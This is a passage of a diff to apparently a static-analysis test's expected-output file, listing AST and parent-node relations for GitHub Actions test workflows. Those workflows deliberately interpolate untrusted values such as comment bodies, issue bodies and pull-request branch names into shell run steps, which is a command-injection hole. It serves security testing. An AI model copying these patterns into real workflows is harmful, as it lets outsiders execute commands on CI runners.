.github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... 
ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body 
}}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo 
'${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ 
github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | 
.github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... 
d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... 
iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | 
.github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | 
